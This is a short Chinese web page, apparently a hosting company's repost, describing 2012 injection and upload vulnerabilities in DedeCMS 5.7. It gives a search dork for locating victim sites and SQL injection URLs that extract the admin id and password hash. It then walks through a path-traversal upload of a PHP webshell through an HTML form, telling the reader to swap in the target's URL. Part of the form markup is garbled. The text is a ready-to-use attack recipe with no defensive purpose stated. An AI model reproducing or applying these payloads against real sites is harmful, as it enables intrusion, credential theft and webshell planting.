- 挂牌上市企业
- 60秒人工响应
- 99.99%连通率
- 7*24h人工
- 故障100倍补偿
dedecms5.7最新注入和上传漏洞 |
| 发布时间: 2012/7/9 18:17:00 |
|
漏洞类型:注入漏洞、上传漏洞
漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。 然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码 得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5 上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证, 只要登陆会员中心,然后访问页面链接 “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post” 说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post” 于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm <form action="=../dialog/select_soft_post] <[/url">http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。 本文出自:亿恩科技【www.enkj.com】 |
0371-60135900
京公网安备41019702002023号
香港服务器租用
美国服务器租用
电信骨干机房
联通骨干机房
